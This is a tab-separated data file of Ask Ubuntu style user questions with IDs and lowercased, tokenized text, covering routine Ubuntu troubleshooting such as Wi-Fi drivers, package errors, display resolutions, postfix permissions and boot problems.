269822	account login via online security	is there any way i can setup my ubuntu pcs authentication ( login ) username / password system via some cloud / online account . so i can only access my pc using that online ( or may be cloud ) username password . reason for this is , in case i lose access to my pc i can change my credentials online and therefore disabling access to pc and my data on my hdd . i can use bios password , but that is always crackable via some hardware means and this is not 100 % safe .
269824	ubuntu 12.04 on dell latitude e6410 can not connect to wireless	i just wiped my dell latitude 's e6410 's hard drive and installed ubuntu-12.04-desktop-amd64.iso . the wireless connection kept timing out , but the wired connection is perfectly fine . i already tried to sudo apt-get remove bcmwl-kernel-source sudo apt-get install bcmwl-kernel-source but it did not solve the problem . output of lspci : 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wwireless lan controller ( rev 01 ) output of sudo lshw -c network : *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth2 version : 01 serial : 5c : ac:4c:14 : f4 : dd width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : e6e00000-e6e03fff output of nm-tool ( sorry about the formatting , this is inputted by hand ) device : eth2 [ belkin_e18584 ] type : 801.11 wifi driver : wl state : connecting ( configuring ) default : no hw address : 5c : ac:4c:14 : f4 : dd capabilities : wireless properties wep encrypion : yes wpa encrypion : yes wpa2 encrypion : yes
269827	ca n't access root user	i came home from work and restarted my server pc just for a bit of refreshment and it turned on me and did the opposite . i 'm running open media vault , it 's been very good to me , until now , i used to be able to access it just by typing in the ip of the computer or computer name ( omv ) and it would give me a nice interface , it does n't work now it just says : 500 internal server error i also used to be able to login via ssh using putty as the root user but now it just says : connection refused before i even get a chance to type in any login details . i can still log in as other users but i need root permissions . any ideas ?
269831	albums are not visible in ubuntu one music	i have a problem with my mp3 files , wich i uploaded to my ubuntu one cloud account . cause iâ´m using ubuntu one music too , i uploaded several of my mp3 files in a folder . i recognized , that in my one music account , those files which do not have any id3 tag are visible as unknown artist-unknown title-unknown album . so i dowloaded easytag on my ubuntu desktop and edited all of them to correct id3 tags . on the first album that i have uploaded , this went well and the album is correctly recognized and visible ( even with its playlist numbers ) ... well its not a correct album indeed . i created myself a `` best-of '' album from this artist and uploadet the mp3 files which i want to have on this `` album '' . but it went well , so i thought that this would be the way to do this stuff . i have done the same on a few other artists and now the problems have begun . the files are correctly stored in my cloud account but are not visible in my one music account . i did not see the album and also not the files . only on the `` artists '' region , i will see the files and can stream them . the other weird problem is , that some albums are recognized correctly by their name and if i click on on of those , i also see only a few mp3 files which are streamable and not all of them . for example i made a best-of album of feeder and uploadet 12 mp3 files ... the album is visible as `` feeder - best of '' and then there are only 3 songs available to stream . does anyone of you have an idea , what its going wrong on my one music account ? the files are standard mp3 files without any drm stuff . and sorry if my english is not the best .. cause i am austrian , my native language is german : )
269833	create c++ native code without qml	i want to create native c++ code for ubuntu phone that is not qml based . in fact , i want to create native c++ code that : 1 ) does not use or depend upon qt 2 ) uses sdl to bring up a window 3 ) get a gles2 context in truth i am porting a very large code base . this code base was already ported to android , but working with android 's ndk is pain like i have never felt before . i 've coded for n9 , n900 and am quite familiar with that toolchain : scratchbox , but all i have found so far is examples of getting qml applications on the phone . pointers ? links ?
269834	how to generate a mov-file from png images ?	i have 400 png images , from which i want to generate a quicktime movie ( .mov ) . the filenames have the style : img1.png img2.png ... img10.png imp11.png ... img100.png img101.png ... i used to do that on a mac using imagej but unfortunately this requires a 32 bit version of java . i also tried it using imagej on ubuntu , but the option to create a quicktime movie does not exist there .
269843	running 12.10 on an old computer with xp , i no longer want xp	i used the windows installer from the ubuntu website and want to remove windows as i no longer need it help !
269849	long wait time on login	i have to wait a long time ( about 15s ) after entering login credentials . i read some other posts but did n't find anything relevant to my situation . in the .xsession-errors log , there are two errors and i think one of them could be the cause of the delayed login . compiz ( core ) - info : starting plugin : session i/o warning : failed to load external entity `` /home/user/.compiz/session/10e5e71fff61fc4529136368274098992100000031290040 '' and the below nautilus error even though i have disabled personal file sharing in startup applications . nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory if one of these is the reason , please help me resolve it . or let me know what else i could try out . update : i removed nautilus-share and dont get that 2nd error anymore . any idea what that compiz error means ?
269850	pptp vpn connected and tunnel is established but doesnot work	i have setup the pptp vpn connection manually in /etc/ppp/peers/myvpn and its contents are pty `` pptp < host > -- nolaunchpppd '' name myusername remotename myvpn linkname myvpn ipparam myvpn usepeerdns require-mppe file /etc/ppp/options.pptp i have also set the /etc/ppp/chap-secrets file problem is i can connect to this vpn connection using pon myvpn nodetach but can not access to any machines in that network . i even get the ip for ppp0 when viewed using ifconfig command but when i make the vpn connection using networkmanager applet it works without any problem . i really need this vpn to work from manual settings .
269854	numpad behaviour constantly changing	i have a lenovo g550 laptop with ubuntu 12.10 installed and i have a problem with the numpad/num lock behaviour ( standard hungarian layout ) . sometimes when i press home ( key 7 ) it types 7 ( or press end it types 1 , etc . ) so i need to press num lock to change the numpad status ( for eg . to on or off ) . but after a while i need to press num lock again cause home key types 7 again . so regardless of the num lock status my keyboard sometimes behaves differently from time to time . what do i need to set to make the num lock behaviour constant ?
269855	windows client : stop synchronising all subfolders from ~/ubuntu one ?	how can i prevent the windows client from downloading the content of all folders i created in the ubuntu one web interface ? in the folders tab there is no option to deactivate the sync for the ubuntu one folder . this folder apparently includes all files and folders from the web interface . on my ubuntu machine however i can select which folders to synchronise . i use the folders on the web interface to share files with friends . so i do n't want to copy them to all of my computers . i created an extra folder on my ubuntu machine for the files i need to have on every machine . this one i can select to sync locally or not in the windows client .
269856	dpkg : error : unable to access dpkg status area : read-only file system	i am a newbie in this operating system i installed ubuntu 12.10 and i found it very interesting to use . then once i install chromn from ubuntu software i got i/o error after that i could not install any application . sudo apt-get install unrar w : not using locking for read only lock file /var/lib/dpkg/lock e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . when i type sudo dpkg -- configure -a dpkg : error : unable to access dpkg status area : read-only file system i have tried many solutions like sudo apt-get autoremove & & sudo apt-get clean & & sudo apt-get autoclean w : not using locking for read only lock file /var/lib/dpkg/lock e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . no used , i am really need your help . thank
269858	how do i prevent the file 'recently-used.xbel ' from being created ?	i want to permanently prevent ubuntu 12.10 from creating a `` recently used '' file list . this list seems to be stored in the file : /home/user/.local/share/recently-used.xbel i have tried deleting this file , but it keeps being recreated every time i start a new login session . i need to know how to prevent this file from being recreated .
269872	ca n't connect to wireless network on hp mini after installing ubuntu 12.10	i got a used hp mini yesterdayand installed ubuntu 12.10 today . like others , i can not connect to a wireless network . `` enable networking '' is checked but no connection options appear . ethernet works . network settings only gives the options `` wired '' and `` network proxy '' . i tried the command `` sudo lshs -c network '' but get `` command not found '' . in addition , suddenly my arrow keys are n't working ( pretty sure they were working yday though ) . so when i reboot , i ca n't choose ubuntu since i ca n't go down ... ( not sure if i should open a different thread for this ) . sorry , i rechecked . it 's only the `` up '' and `` down '' arrows that do n't work . it 's hardware problem then ? thanks !
269876	got problems downloading updates in ubuntu 12.10	i got an error icon above my menu bar . when i click on it i get three options with some details . it says an error occurred please run package manager from the right-click menu or apt-get in terminal to see what 's wrong . the error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unmet dependencies '' i tried apt-get in terminal , with commands and options it says see the apt-get ( 8 ) , sources.list ( 5 ) and apt.conf ( 5 ) manual pages for more information and options . this apt has super cow powers . when i tried to update my system it failed to update and showed this error message : the package is broken the following packages have unmet dependencies : steam-launcher : depends : curl but it is not installed depends : jockey-common but it is not installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu20 is installed
269878	how to use expect with bash	i have created a shell script as given below.this script will login to a remote server as a normal user then switch to root user for creating a directory.the script is as given below . ssh -t qbadmin @ 10.3.2.0 ' su root -c `` echo \ '' give directory name : \ '' ; read dir ; mkdir \ $ dir ; `` ; ' here the script will ask password for normal user first.then again it will ask for root password.how could i automate this using expect command.i want to supply the password automatically for the root user only.i think it can be done with expect . please do help me .
269880	re-install ubuntu without losing data in home folder	recently i have installed ubuntu 12.10 x64 server edition on my pc . unfortunately , i attempted to install a lightweight desktop but due to the fact that i have an old graphics card , the pc does not perform so well . i am thinking of re-installing an ubuntu version but i do not want to loose the contents in my home folder . is there any way to do that with a live cd ?
269882	what to do after 'chmod -r 777 / ' ?	i have many file permission problems , as being a newbie , i unfortunately set permissions on everything somehow to 777 ( chmod -r 777 / ) . i believe i 've done this from the root directory logged in as the root and now ca n't really do much at all but log in as another user . i need to mainly change the ssh permissions , but obviously ca n't because it wo n't let me log in as the root user . so to sum it up , i ca n't log in as the root for this , i can log in as another user ( 'shannon ' for example ) , and this user ( 'shannon ' ) does n't have full permissions . any ideas ?
269883	ubuntu 12.04 freezes after update	i am working with ubuntu 12.04 for a while now , constantly upgrading and afterwards cleaning with ubuntu-tweak 's janitor . everthing went fine until about two weeks ago : then my computer constantly froze after approx . twenty seconds . sometimes i had an error message , but not always , saying : '' usr/share/apport/appport-gpu.error-intel.py '' nothing helped , the problem continued . i re-installed . then it worked again , i updated , but did not use ubuntu tweak . it worked , today ( march 19th ) i updated only and had the problem again . recovery mode does not help . what to do ?
269894	wifi disconnects when ethernet connected	i 'm using a wifi connection on ubuntu 12 and connecting to xp directly via ethernet cable . i 've set the ipv4 settings of the ubuntu wired connection to : share with other computers and restarted . if the network cable is plugged in wifi disables . is this problem on the xp side ? ip is set to automatically obtain etc . i 'm only looking to share the internet access . thanks .
269895	can i install a pc-mac dvd rom application on ubuntu 12.04lts ?	i bought by mistake a collection of sceneries for xplane ( fligh sim ) but i did n't realise these dvds are for pc and mac only . is there a way to install them on ubuntu anyway ? thanks for your patience , i am a noobie ; - )
269901	ubuntu 12.10 . ca n't add custom resolution	system : ubuntu 12.10 , nvidia geforce gt240 ( nvidia-current privative driver ) , lg display connected to vga-0 the 1920x1080 resolution is not listed , i 've added it in windows but i 'm having problems doing the same ubuntu . step 1 ) obtain modeline $ cvt 1920 1080 step 2 ) create custom mode $ xrandr -- newmode `` 1080p '' 172.80 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync step 3 ) add custom mode $ xrandr -- addmode vga-0 `` 1080p '' and then i get this error : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 the xrandr output is screen 0 : minimum 8 x 8 , current 1152 x 864 , maximum 8192 x 8192 vga-0 connected 1152x864+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) 1080p ( 0x2f7 ) 172.8mhz h : width 1920 start 2040 end 2248 total 2576 skew 0 clock 67.1khz v : height 1080 start 1081 end 1084 total 1118 clock 60.0hz am i doing something wrong ?
269902	plugging in external monitor to ubuntu 12.04.2 lts causes unknown error at start-up	os : ubuntu 12.04.2 lts os arch . : x86_64 graphic : nvidia nvs 3100m external monitor : samsung syncmaster s20r315b plus laptop model : dell latitude e6410 today i bought `` samsung sync-master s20r315b '' led monitor . before power on machine , i plugged monitor cable in , then power on my laptop . ubuntu started without problem , but , when logged in ubuntu , a window without title appear and its height is too tall , so i ca n't capture it better than this : when ubuntu start nothing show in samsung monitor , well , so i run nvidia-setting command and and in the `` x server display configuration '' section , i see the samsung is disabled ! i have unplugged the cable and plug in again and now , laptop monitor is turned off and samsung showing desktop . it 's good , but , if i unplug the cable again , laptop monitor do n't show anything and remain blank ! i show you the configurations : laptop : external monitor : note : i 'm beginner in ubuntu world , if you want any hardware information please explain what command should i run for it . : ) thanks . p.s . now when i closed nvidia setting window , i see this error in terminal : error : unable to open file '/home/netmoon/.nvidia-settings-rc ' for writing .
269906	does booting ubuntu in samsung laptop brick them ? how do i know without taking risk of my laptops	i 've got 2 samsung laptops ( samsung np550p5c-s01in & samsung np350v5c-s06in ) i 've read it recently that booting linux in samsung laptops bricked them permanently . i wish to install ubuntu on both of these but i want to know if i can install ubuntu in any one of them without bricking them permanently . is there any way through which i can verify if these can boot ubuntu safely since both of them have that secure boot thing on them . please help .
269909	not able to apt-get install any software	i am using linux mint 9 . recently i have been facing this problem , when ever i want to install any software through sudo apt-get install it does not succeed . it shows e : malformed line 12 in source list /etc/apt/sources.list ( dist parse ) even though i do n't remember changing the file , ever ! the contents of the /etc/apt/sources.list are as below deb http : //packages.linuxmint.com/ isadora main upstream import deb http : //archive.ubuntu.com/ubuntu/ lucid main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ lucid-security main restricted universe multiverse deb http : //archive.canonical.com/ubuntu/ lucid partner deb http : //packages.medibuntu.org/ lucid free non-free # deb http : //archive.getdeb.net/ubuntu lucid-getdeb apps # deb http : //archive.getdeb.net/ubuntu lucid-getdeb games deb http : //archive.canonical.com/ precise partner deb http : //archive.canonical.com/ precise partner deb http : //archive.canonical.com/ natty deb http : //archive.canonical.com/ natty partner deb http : //archive.canonical.com/ precise partner deb http : //archive.canonical.com/ precise partner i have tried to update by using the command sudo apt-get update , even this shows the same error i have no idea what to do . please help . thanks
269913	hot to disable key shortcut for `` alt+the button above tab ''	i am comfortable using alt up and alt down after typing alt tab , so i do n't need the short cut `` alt+the button above tab '' to do that . and this is my favourite shortcut for maybe my most heavily used emacs command . how can i disable it ( not knowing how this key is named is not helping me ; in my spanish keyboard has a symbol i do n't even know how to translate : - ) ) ?
269918	i have a windows 8 64 bit laptop . which version of ubuntu should i install ?	i want to set up ubuntu on another partition on my 64bit windows 8 laptop . i would appreciate some suggestions as which version i should be going for .
269919	swappiness setting ignored in sysctl.conf	swappiness is set to 0 and i ca n't change it . i tried changing swappiness in sysctl.conf and sysfs.conf - both are ignodered after reboot ( ubuntu 12.04 ) : $ sudo gedit /etc/sysctl.conf vm.swappiness=60 $ sudo gedit /etc/sysfs.conf vm.swappiness=60 /etc/sysctl.d/60-my-swappiness.conf vm.swappiness=60 $ sudo cat /proc/sys/vm/swappiness 0 $ rgrep swappiness /etc/sysctl . * /etc/sysctl.conf : # swappiness /etc/sysctl.conf : vm.swappiness=60 /etc/sysctl.conf~ : # swappiness /etc/sysctl.conf~ : vm.swappiness = 60 /etc/sysctl.d/60-my-swappiness.conf : vm.swappiness = 60 $ sudo sysctl -p vm.swappiness = 60 $ sudo cat /proc/sys/vm/swappiness 60 after reboot it is again 0 : $ sudo cat /proc/sys/vm/swappiness 0 why my settings in sysctl.conf are not loading after reboot ? is it something wrong with procps ? what should i check ? i looked for answer in askubuntu and i other sites , but i not found the answer . i saw this , but there is no answer : swappiness setting ignored in systcl.conf please help
269920	too much noise while recording on 12.10	i 'm using kubuntu 12.10 with backports enabled and i 'm getting too much noise while doing screencasting in kazam or other aplications like recordmydesktop , noise also appears while recording webcam with kamoso . i have an acel travellmate 5760z wich uses an i3 with an intel hd 3000 graphics cards , i am using the webcam and mic of the laptop , so can it be a driver issue ? this started happening 1 or 2 weeks ago , maybe some update gone wrong ? ps : sorry for my bad english and thanks for taking the time . [ update ] hi , i tried kubuntu 13.04 ( raring ringtail ) and i recorded a video with kamoso ( which records webcam ) and audio was fine , no noise appeared , so it seems that this has been fixed for raringringtail , maybe a newer version of a package solved that . but i still have that issue in 12.10 . [ solved ] first , do the steps in the first answer provided by nikth ( maybe you will need to check the source ) , then i installed `` pavucontrol '' and `` alsamixergui '' , and while doing sound recording i kept changing values until i got the combination that made my soundrecording work great .
269921	server at home with static public ip	hi i have a problem with ubuntu 12.04 server . i have checked the ifconfig it seems all the entries are correct except the nameservers do not seem to get resolved . as such when i run /etc/int.d/networking restart i receive an error message . : failed ... eth0 i have been trying for a couple of days . i was given the static ip address and when i ping it is ok , i.e . no packages lost . however on the server i can not access internet and webpages . i think i may have given incorrect values . /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address xxx.xxx.xxx.xxx ( i iused the ip address given by isp , not sure whether this is correct ) netmask 255.255.255.0 network xxx.xxx.xxx.xxx ( used the ip address given by isp i.e . wan ip ) broadcast xxx.xxx.xxx.255 ( combination of ip and subnet ? ) gateway xxx.xxx.xxx.xxx ( got it from router ) dns-servers xxx.xxx.xxx.xxxx xxx.xxx.xxx.xxx ( provider by isp , obtained the values from router ) when i run cat /etc/resolv.conf , i do not see any values . thank you for all the help .
269944	how to configure auto lock screen ?	i'am using mate desktop environment 1.5.7 in ubuntu , i checked both options in screensaver window but it 's not working , so how to set auto lock screen as in unity ?
269946	how to rip an audio track in flac from a dvd video ?	more and more audio cd are sold together with a dvd video containing bonus tracks . i want to rip only the audio part of those videos using a losseless audio codec , ideally flac for me . is there an easy way to rip audio tracks from a dvd video in flac ? note : my question is specifically about flac encoding , i do n't think it should be marked as a duplicate of question how do i rip audio from a dvd ? . moreover the answers of the previous question are not really relevant in my case .
269949	audio from speaker on pc not workin during google+ hangout 12.10	ever since i freshly installed ubuntu 12.10 , i have sound issues during google+ hangouts . i hear a strong echo , reverb , and what not . mostly after 5-15 minutes it corrects itself , but not all my conversations are more than 15 minutes ( and it 's still extremely annoying ) . if i hangout via my chromebook , i do n't have this problem , and the hangout settings are the same on both . and as i did n't have this issue before 12.10 , and i have n't changed any hardware , i am assuming it has to do with ubuntu 12.10 . i tried to change all the audio settings i could find ( in the hangout and via system settings ) , but the problem still is n't solved . i also have this problem on other user accounts , if that 's important somehow . update since a couple of days the problem has disappeared . that is , the reverb and echo are gone after a couple of seconds of starting the hangout . i did upgrade to 13.04 a month ago , but the problem remained , so i 'm guessing that had nothing to do with it . i am assuming google improved their sound settings with their new hangouts and that it was never an ubuntu issue ( which makes sense as i had no other sound issues ) . ubuntu 12.10 64-bit | amd64 athlon ii x3 | 3.2 ghz | 4gb ram | ati radeon hd4250 chrome | webcam with microphone ( usb ) | speaker ( mini-jack )
269951	ubuntu will not run after installation	i just installed installed ubuntu on my hp pavillon dm4 running a windows 7 , and when i choose ubuntu from the startup option when the company is coming on , it freezes and i can not do anything else .
269953	problem booting ubuntu 12.04 after hibernate/suspend	linux 3.2.0-38-generic # 61-ubuntu smp tue feb 19 12:18:21 utc 2013 x86_64 x86_64 x86_64 gnu/linux distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise before doing apt-get update and apt-get upgrade i was able to successfully suspend the machine by using /etc/acpi/sleep.sh . after that now when the machine boots it hangs and the only way to boot is by choosing recovery mode - > resume boot . i am attaching the output of dmesg at the moment of crash : dmesg cat /proc/acpi/wakeup > wakeup
269954	where is secure boot uefi enabled ubuntu 12.04.2 ?	currently i 'm downloading ubuntu 12.04.2 from official http : //www.ubuntu.com/download i just read on m.h-online.com and on linux.com that secure uefi boot version have been released . so i wanted to know if i 'm downloading that secure boot uefi version from ( http : //ubuntu.com/download ) or i have to download that secure boot uefi edition from somewhere else ? since i have a samsung laptop and i do n't want to take the risk of bricking it .
269955	usb drive removed while write now gparted hangs	i was writing to drive with unetbootin . this is the error on attempted mount : failed to open directory `` 0ffd-2516 '' . error when getting information for file '/media/0ffd-2516/╛▌ü╞φç.sfì ' : input/output error . please help . thanks .
269957	start vim automatically as root in home folder	is it possible to start vim automatically with root permission if i start it in my home folder ( or in a subdirectory of that folder ) ?
269958	updated linux kernel , nvidia driver not functioning . os is running at lower resolution with most features unusable	after i updated my linux kernel this morning , my computer no longer boots up with the nvidia logo , and instead with an intel one . i updated my drivers and rebooted , still had the same problem . the computer now runs at a lower resolution , and i ca n't see the sidebar with applications , or the context menu at the top of the screen . my computer is basically unusable with ubuntu right now . i 'm quite sure that this problem does not have to do just with the drivers .
269966	software center fails - cant find the `` duplicate '' answer	i have the problem not being able to download software i keep getting the error to check internet connection then sometime something about an untrusted source . i see this has been asked but keeps getting marked as a duplicate can someone please direct me to the original question , i have looked and looked and ca n't find the resolution . thanks soo much !
269968	wireless pci card linksys wmp54g v2 does n't work in ubuntu 12.04	after spending my time in a lot of website without result , i hope someone could help me . i have a pci card linksys ( not recent ... ) model wmp54g v2 , which does n't work in ubuntu 12.04 . ubuntu automatically find this driver : driver broadcom sta wireless , but during the installation , the procedure seem freeze it self ; ( the installation bar still run , but nothing happens ) so i reboot the pc , and looking into `` additional driver menu '' and driver is installed : well ! then i try to add a wireless connection from `` network menu '' but i ca n't see wireless card . i 've tryed to install diver b-43xx from software center but without result . do you have any idea ?
269973	testdisk or gpart for recovering lost partitions ?	well , my problem is that i was trying to make a windows xp installer for a usb flash drive using wintoflash . but when it was in the process of formatting the usb , a bsod occurred and my pc ca n't boot into windows anymore . after the bios thing it only shows a black screen with a `` j '' . i think i somehow lost my partitions table because now it only shows a blank 2.0 tb hdd . so , i have read about testdisk and gpart for recovering lost partitions , but i do n't know which is best or what are the differences between them . i have like 6 ntfs partitions no ext3/ext4 or any other non-windows format . right now i 'm using a live ubuntu 11.10 usb . so please , i would like to know , what do you recommend ? thank you very much in advance .
269976	after libreoffice updated it wo n't start !	i read seth 's post here : how do i install libreoffice 4 ? . i wanted to upgrade , so i ran the commands as provided by mik to upgrade using stable ppa . for some reason now when i try to run libreoffice it starts up , shows the splash screen , loads about maybe 2-3 % and then quits , giving me an ubuntu error . i might have only partially updated/upgraded , so this might be part of the problem ... i 'm not sure . help ! ! i really need to use libreoffice for a biology class i have . i can use abiword for now , but i really prefer libreoffice . i want to try and fix it , but if i do n't get a quick answer i am afraid i may have to go to ( heaven forbid ) windows xp i dual-boot with to use ms word/open office . here 's the error output i got when i launched writer from terminal : nate @ texno-satellite-a105 : ~ $ libreoffice -- writer javaldx : could not find a java runtime environment ! warning : failed to read path from javaldx terminate called after throwing an instance of com : :sun : :star : :uno : :deploymentexception'
269978	xampp + apache + mysql	for my machine setup i need to run lampp and another mysql/apache instance in parallel . i already changed the ports of lampp apache & mysql but it still says xampp : another web server daemon is already running . xampp : another mysql daemon is already running . how can i convince lampp to start mysql and apache even if there is already running an instance of them ? edit : well . in apache i didnt change https port . this works now . but mysql does still error about another instance .
269979	add custom folder shortcuts to places list	is there a way to add a folder to the computer list on my menu ? i would like to add workbench . i do n't want to add it as a bookmark . i want it to appear in the same list as everything else .
269982	ibus : increase font size and spacing beween words	i use ibus to type in different languages . but for some reason for a language other than english the font size is always smaller and the spacing between words much smaller . is there anyway i can customize these permanently ? i have provided a screenshot of gedit with text entered in three languages - telugu ( rts ) , sanskrit ( harvard-kyoto ) and english for comparison . in brackets , i have shown how it is supposed to look . i have realized that word spacing is partly editor dependent . but the font size is invariably smaller . this is specially the case for telugu .
269987	ubuntu does not detect hdmi ( tv )	i have a z68 motherboard which got a hdmi connection . ubuntu wo n't detect my tv through it , neither will it detect that i have two gpu 's ( hd 4870 and intel hd 3000 ) it should work like this , as it does on windows 7 . hdmi motherboard - > intel hd 3000 ( cpu ) - > tv i 've enabled multi-monitor through the bios , but my primary display is chosen as my pci-e gpu . i 've been told anything you can do on windows , you can do on ubuntu with a little work . would appreciate any help < 3 /sara
269989	was able to use proprietary ati driver before , now on clean install i do n't have that option	i am running 12.04lts , and i just formatted . prior to the format , i was using the ati proprietary driver through `` additional drivers '' . i have two ati radeons that are crossfired . now , when i do go to additional drivers , it ca n't find any drivers . i attempted the fglrx install through https : //help.ubuntu.com/community/binarydriverhowto/ati , but it ended badly . i just did a clean swipe again and would like to know where to go from here . my working previous install was fully updated as of yesterday . ( 18th of march , 2013 )
269993	is it possible to block a webpage using ufw ?	basically i have two machines x and y. i want to block `` http : // < ip-of-y-here > /afolder/ '' from machine x on http port 80 using ufw . trivially , this can be completed ( awfully ) using ufw through : sudo ufw deny out 80 but is it possible to do something along the lines of : ufw deny from ( x ip address ) port 80 to ( y ip address ) /afolder that will satisfy my requirements ?
269994	postfix master.lock : permission denied	i 'm triyng setup the postfix , but with no success . i am using webmin to configure . my problem is that postfix wo n't start , always with the same message : mar 19 19:21:13 site postfix/postfix-script [ 1247 ] : starting the postfix mail system mar 19 19:21:13 site postfix/master [ 1248 ] : fatal : open lock file /var/lib/postfix/master.lock : can not open file : permission denied mar 19 19:21:14 site postfix/postfix-script [ 1318 ] : warning : group or other writable : /var/lib/postfix mar 19 19:21:14 site postfix/postfix-script [ 1325 ] : warning : not set-gid or not owner+group+world executable : /usr/sbin/postqueue mar 19 19:21:14 site postfix/postfix-script [ 1326 ] : warning : not set-gid or not owner+group+world executable : /usr/sbin/postdrop mar 19 19:21:14 site postfix/postqueue [ 1357 ] : warning : mail system is down -- accessing queue directly i 'm going crazy with this ... really ! i do n't know more what to do ... i already tried to create the file master.lock , set permission , delete file , reboot server ... see the permissions : drwx-wx -- - 2 postfix postdrop 4096 mar 19 18:04 /var/spool/postfix/maildrop drwx -- s -- - 2 postfix postdrop 4096 mar 19 17:54 /var/spool/postfix/public drwx -- -- -- 2 postfix root 4096 mar 19 17:54 /var/spool/postfix/private -rwxrws -- - 1 root postdrop 13624 feb 20 23:38 /usr/sbin/postdrop -rwxrws -- - 1 root postdrop 13608 feb 20 23:38 /usr/sbin/postqueue drwxrws -- - 2 postfix postdrop 4096 mar 19 19:11 var/lib/postfix it seems , obviously , its a permission problem , but i do n't know how to fix it ... i have spent about 4 hours researching and triyng all i 've found ... but with success thanks
269997	can you run command line tools on ubuntu touch ?	is there a way to run command line tools on ubuntu touch ? could i run things like vim , gcc , ssh in a terminal app ? or is touch completely disjoint from the normal linux world , and can it only run `` apps '' specifically written for the platform ?
269999	how can i use line in jack for second pair of speakers ?	i have a extra pair of speakers and i plan to use them with my existing one . i 've gone around in circles googling for an answer but still no perfect solution . i 'm on ubuntu 12.10 . i 've done it on windows 7 . i have a built-in 5.1 stereo sound on my motherboard .
270006	why user should never use normal sudo to start graphical application ?	i 've read the comunity `` rootsudo '' documentation and am interested in this line : you should never use normal sudo to start graphical applications as root . why ? what is the difference ? please provide a simple explanation , as i 'm just a normal desktop user .
270007	plymouth messed up	i used plymouth manager , trying to the usual thing ( changing the boot splash ) . it did this , but to the wrong one - so i tried to change it back . this apparently failed and i started to get an error like boot splash failed to load - too many levels of symbolic links . it would then display all of the drivers loading ( after a small pause ) and then go to the login screen . after some updates i ran about a month ago it went totally black and nothing shows , not even the error . it still loads the login screen and works fine , but nothing displays during boot-up . i really kind of liked the ubuntu splash and want it back . any help is accepted thankfully !
270009	system load indicator only display in system tray	system load indicator ( indicator-multiload ) starts only in system tray part of the panel . therefore , having more than one monitor/meters ( e.g . cpu , network ) will only occupy the space of a single meter/monitor . so adding more meters just get smaller and smaller . can someone please tell me how to move system loader indicator outside of the system tray panel , and into the general applet part of the panel ? i am using lxde/openbox desktop manager ( see system details below ) . os : -version- kernel : linux 3.2.0-38-generic ( i686 ) compiled : # 61-ubuntu smp tue feb 19 12:20:02 utc 2013 distribution : ubuntu 12.04.2 lts -current session- desktop environment : lxde ( lubuntu ) system loader version : 0.2
270011	broken python ( 2.7 ) after manually building and installing python 2.6	running ubuntu 12.04 , i had the usual python 2.7 in place . i needed python 2.6 , so i downloaded the source and did ./configure make sudo make install a mistake , as i did not want to replace my system-wide python . now some programs stopped working , e.g . update-manager with importerror : no module named gi.repository i used update-alternatives to make python 2.7 default again , but many python applications still wo n't start up because of some missing modules . can someone give a hint what happened and what the best way to fix it would be ? thanks in advance . edit : i could get some functionality of apt-get to work by setting my own hard link from /etc/python to /etc/python2.7 . ( so i guess using update-alternatives really did not do much good eithe. ) i did a dist-upgrade , which basically worked , but a lot of the package managing via apt-get is still broken . in particular , a problem with python-minimal prevents many other installations of packages i wanted to do . setting up python-minimal ( 2.7.3-0ubuntu7 ) ... traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/runpy.py '' , line 162 , in _run_module_as_main `` __main__ '' , fname , loader , pkg_name ) file `` /usr/local/lib/python2.7/runpy.py '' , line 72 , in _run_code exec code in run_globals file `` /usr/local/lib/python2.7/compileall.py '' , line 16 , in < module > import struct file `` /usr/local/lib/python2.7/struct.py '' , line 1 , in < module > from _struct import * importerror : no module named _struct dpkg : error processing python-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 255 ps : building 2.7 from source always did exit ( also before dist-ugprade or update-alternatives ) with make : *** [ libinstall ] error 1 currently , on make , there are more issues ( `` python build finished , but the necessary bits to build these modules were not found : _bsddb bsddb185 bz2 dl imageop sunaudiodev to find the necessary bits , look in setup.py in detect_modules ( ) for the module 's name. '' ) as this is a little over my head , i guess i am just better off with a fresh install from scratch .
270014	how to add debian experimental repo to ubuntu ?	i would like to install cups-1.6.1-2 ( link ) from the experimental repository . i suppose i have to add something to /etc/apt/sources.list but i ca n't figure out what . can anyone figure out ( or know ) how to add the experimental repo ?
270020	no media found error while booting from live usb	i am trying to install ubuntu 12.04 lts from live usb disk . while booting from usb i am getting error as `` /init line 7 can not open /dev/sdb : no media found '' . my machine is currently dual boot with windows-7 and fedora 17 . i wan na get rid of fedora asap . i am using sandisk cruiserblade 4 gb media . i used unetbootin for creating live usb from iso file . please help me resolve this problem asap . thanks in advance .
270022	low graphics mode error	i have a dell inspiron 910 and am receiving a running in low graphics mode error . i believe the error was caused by attempting to install a game i did not have the proper space for . i have tried a few of the fixes described in previous posts but have had no luck . i get messages that i have zero space remaining .
